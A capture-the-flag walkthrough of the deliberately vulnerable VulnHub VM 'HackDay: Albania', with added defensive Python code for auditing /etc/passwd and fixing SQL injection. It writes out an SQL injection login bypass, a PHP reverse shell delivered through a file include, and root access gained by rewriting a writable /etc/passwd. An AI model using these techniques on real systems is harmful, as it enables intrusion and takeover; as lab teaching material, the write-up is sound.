[VULNHUB] HackDay: Albania

HackDay: Albania is a really interesting VM where I learnt a few new things about SQLi and PHP.

TOO MANY DIRECTORIES

First of all scan the available ports of the target:

nmap 192.168.1.19 -sV -p 1-65535

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-21 09:24 CET
Nmap scan report for 192.168.1.19
Host is up (0.013s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.20 seconds

So there is an SSH service and an HTTP one.
Before browsing to http://192.168.1.19:8008 let's grab some information with nikto:

nikto -h 192.168.1.19 -p 8008

Nikto reported that the /robots.txt file contains a lot of entries, so I opened it:

Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/

Opening a few of them shows the same image, which says that it is not the correct directory. So I used curl in a loop to find out which folder was the right one. First I created a .txt file with the folder names, one per line and without slashes, then I wrote a script:

#!/bin/bash
# list.txt holds the directory names from robots.txt, one per line, without slashes
while IFS= read -r j; do
    printf 'Testing %s folder...\n\n' "$j"
    curl -sL "http://192.168.1.19:8008/$j/"
    printf '\n\n'
done < list.txt

In the terminal output one folder returned a different HTML source:

Testing unisxcudkqjydw folder...

IS there any /vulnbank/ in there ???

BINGO!

THIS BANK IS NOT SO SECURE

Browsing to http://192.168.1.19:8008/unisxcudkqjydw/vulnbank/ I discovered that directory listing is enabled and there is only one folder (client). Clicking on it brought up the Very Secure Bank website with a login form. I tried some SQLi techniques: putting a single quote in the username field produced an error:

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102

OK, it looks vulnerable to SQLi. I spent a lot of time looking for the right pattern: OR, AND and UNION all failed. After some hours I had the idea of using a comment to cut off the rest of the query, like this:

user' #

I used # because the -- comment returned an error, while with # I only got "Invalid Credentials...". The reason is that in MySQL -- starts a comment only when it is followed by whitespace; the application appends the closing quote directly after the injected value, so a payload like user'-- leaves that quote inside the statement and the query breaks, while # comments out the rest of the line unconditionally. Now I bruteforced the username with Burp Suite: I captured the POST request and used Intruder with the following payload position:

POST /unisxcudkqjydw/vulnbank/client/login.php HTTP/1.1
Host: 192.168.1.19:8008
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.19:8008/unisxcudkqjydw/vulnbank/client/login.php
Cookie: PHPSESSID=cfg95pqu6gukj980niqriu7uq0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=§user§' #&password=something

I used rockyou as the wordlist and after some time found that jeff' # worked. Logging in with this string in the username field brought up the user's bank homepage. There is an upload form for tickets where I can attach images. First I tried a .gif, but the page returned an error:

After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...

So I tried a .php%00.jpg filename (null byte) and the upload succeeded. I clicked on the last ticket created and then on the blank image thumbnail, but an error occurred:

Warning: include(): Failed opening 'upload/php-reverse-shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/unisxcudkqjydw/vulnbank/client/view_file.php on line 13

That is an include error, so the application probably passes the uploaded filename to include(). If so, I can upload a plain .jpg file with PHP code inside and it will still be interpreted as PHP. Let's try: I used a PHP reverse shell (linked from the original post) saved with a .jpg extension. The upload was successful, so I started a listener locally:

nc -lvp 1234

Then I opened the last ticket again and I got the reverse shell!

PAY ATTENTION TO SENSITIVE FILES, DEAR SYSADMIN

Now I need a TTY. python does not seem to be installed, but before giving up let's check:

find / -name "python*" 2>/dev/null

python3 is present in /usr/bin, so I typed:

/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'

Now I have a TTY and need to escalate privileges. /home contains a single user, which turned out to be useless, so I searched for files with weak permissions:

find / -writable -type f 2>/dev/null

The first result was the /etc/passwd file! So I copied its content locally so I could add a new user. I also need a password hash, because Ubuntu's PAM configuration (pam_unix with nullok_secure) accepts an empty password only on the consoles listed in /etc/securetty, not on a pseudo-terminal. Since the file is writable, the hash can go straight into the second field of /etc/passwd: when that field is not x, it is used for authentication instead of /etc/shadow.

openssl passwd -1

I used "test" as the password and added a new line to the passwd file:

test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash

Notice that UID and GID are set to 0. I saved the file and encoded it in base64:

base64 -w 0 passwd

Then I copied the base64 string and ran this in the reverse shell:

echo "BASE64_STRING" | base64 -d > /etc/passwd

I omitted the base64 string because it is very long. Now verify that the file was overwritten:

cat /etc/passwd

This is the output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash

Now just log in as the test user:

su - test

We are now root. List the files in /root and you will find the flag:

cat flag.txt

Finished!
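The privilege escalation above leaves two tell-tale traces in /etc/passwd: a second UID 0 account, and a crypt(3) hash sitting in the password field where login programs read it directly instead of consulting /etc/shadow. The following Python script is an added example, not part of the original writeup: it parses a passwd file and flags both conditions, which is the check a defender would run from a host audit or cron job, and it also shows why the attack works. The sample text is a constructed excerpt of the dump shown above (the names and the hash are taken from it); the filename in the usage note is an assumption.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed excerpt of the /etc/passwd dump shown above, attacker's line last.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
test:$1$owFfBsc7$w1wg1/M40pBlbFVMBT2w61:0:0:test:/root:/bin/bash
"""

# crypt(3) prefixes: $1$ MD5 (what `openssl passwd -1` emits), $2*$ bcrypt,
# $5$ SHA-256, $6$ SHA-512, $y$ yescrypt.
CRYPT_HASH = re.compile(r"^\$(1|2[abxy]?|5|6|y)\$")

# Values that legitimately appear in the second field: "x" (hash is in
# /etc/shadow) or a locked marker.
NORMAL_PASSWD_FIELDS = {"x", "*", "!", "!!"}


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) lines; every entry has exactly seven colon-separated fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (account, reason) pairs for the traces a passwd-file backdoor leaves."""
    findings = []
    for e in parse_passwd(text):
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "UID 0 account that is not root"))
        if e.passwd == "":
            findings.append((e.name, "empty password field: no password required"))
        elif CRYPT_HASH.match(e.passwd):
            # With a hash here, pam_unix never looks at /etc/shadow for this user.
            findings.append((e.name, "password hash stored in /etc/passwd, /etc/shadow bypassed"))
        elif e.passwd not in NORMAL_PASSWD_FIELDS:
            findings.append((e.name, f"unexpected password field {e.passwd!r}"))
    return findings


if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
```

Run it as `python3 passwd_audit.py` (assumed filename) to see the two findings for the test account; to audit a real host, pass `open("/etc/passwd").read()` to `audit_passwd()` instead of the sample. The complementary hardening check is the one the attacker used from the other side: /etc/passwd must be owned by root with mode 0644, so `find / -writable -type f` from an unprivileged account must never list it.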

CONCLUSION

This is the relevant part of the config.php source code:

function check_login($username,$password){
    // keyword "filter": one case-insensitive pass per keyword, output is not re-scanned
    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    // quotes are stripped from the password only, never from the username
    $password = str_ireplace("'","",$password);
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if($result >= 1) {
        return $result;
    } else {
        return -1;
    }
}

The strings OR, UNION and AND are stripped from the username field (case-insensitively, in a single pass), while the single quote is stripped from the password field only. That's why user' # works: the quote closes the string literal, # comments out the rest of the statement, and the query that reaches MySQL is SELECT ID FROM klienti where `username` = 'user', which returns an ID as soon as the username exists, regardless of the password. This is also why bruteforcing the username alone was enough. Also check out view_file.php:

$klient_id = $_SESSION["id"];
$filename = $_GET["filename"];
if(endsWith($filename , ".jpg") || endsWith($filename , ".png") || endsWith($filename , ".jpeg") || endsWith($filename , ".bmp")) {
    // the suffix check passes, so the file is handed to include() and parsed as PHP
    include("upload/" . $_GET["filename"]);
} else {
    echo "Only images are allowed to get included. We hate hackers.";
}

This code only checks that the filename ends in .jpg, .png, .jpeg or .bmp; if it does, the file is passed to include(), which parses and executes any PHP code it contains regardless of the extension. An image file is something to be read and sent to the browser with the right Content-Type, never included. Note also that the filename is not passed through basename(), so the suffix check says nothing about which directory the file actually comes from.
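To make the reasoning behind the user' # payload and the -- failure concrete, here is an added Python example (not code from the original post or from the VM): it ports the keyword stripping and string concatenation of check_login(), emulates MySQL's comment rules so that the statement MySQL would actually run is visible, executes that statement against an in-memory sqlite3 stand-in for the klienti table, and places a parameterised query next to it as the fix. It goes one step beyond the writeup by showing that the single-pass str_ireplace() filter is also bypassed by doubling a keyword (OORR becomes OR). The table row is constructed, and the password is stored in plaintext because the original query compares it directly.

```python
import re
import sqlite3


def php_str_ireplace(search: str, replace: str, subject: str) -> str:
    """Case-insensitive replacement in one left-to-right pass, like PHP's
    str_ireplace(): the result is never re-scanned, so 'OORR' becomes 'OR'."""
    return re.sub(re.escape(search), replace, subject, flags=re.IGNORECASE)


def build_login_query(username: str, password: str) -> str:
    """Port of check_login(): same keyword stripping, same concatenation."""
    for keyword in ("OR", "UNION", "AND"):
        username = php_str_ireplace(keyword, "", username)
    password = password.replace("'", "")
    return ("SELECT ID FROM klienti where `username` = '" + username
            + "' and `password` = '" + password + "';")


def mysql_effective_sql(sql: str) -> str:
    """Return the text MySQL would execute after comment handling.

    Outside a single-quoted literal, '#' comments out the rest of the line,
    while '--' does so only when followed by whitespace. An unterminated
    literal is what MySQL reports as a syntax error. Simplification: escaped
    and double-quoted literals are not handled."""
    in_string = False
    for i, ch in enumerate(sql):
        if in_string:
            in_string = ch != "'"
        elif ch == "'":
            in_string = True
        elif ch == "#":
            return sql[:i]
        elif sql.startswith("--", i) and sql[i + 2:i + 3].isspace():
            return sql[:i]
    if in_string:
        raise ValueError("unterminated string literal: MySQL reports a syntax error")
    return sql


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL klienti table with one constructed row."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE klienti (ID INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO klienti VALUES (1, 'jeff', 'correct-horse')")
    return con


def vulnerable_login(con: sqlite3.Connection, username: str, password: str) -> int:
    """check_login() as written: concatenate, then run what MySQL would see."""
    row = con.execute(mysql_effective_sql(build_login_query(username, password))).fetchone()
    return row[0] if row else -1


def safe_login(con: sqlite3.Connection, username: str, password: str) -> int:
    """Hardened form: a parameterised query, so the input is data, never SQL."""
    row = con.execute(
        "SELECT ID FROM klienti WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else -1


if __name__ == "__main__":
    con = setup_db()
    for user in ("jeff", "jeff' #", "x' OORR 1=1 #", "jeff' --"):
        try:
            print(f"{user!r:20} vulnerable -> {vulnerable_login(con, user, 'wrong'):2}"
                  f"   safe -> {safe_login(con, user, 'wrong')}")
        except ValueError as exc:
            print(f"{user!r:20} vulnerable -> error: {exc}")
```

The parameterised query is only half of the real fix: the application also compares the password in plaintext, so the stored value should be a password_hash() digest checked with password_verify() in PHP. Keyword blacklists like the one in check_login() are never a substitute, as the doubled-keyword line in the output shows.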
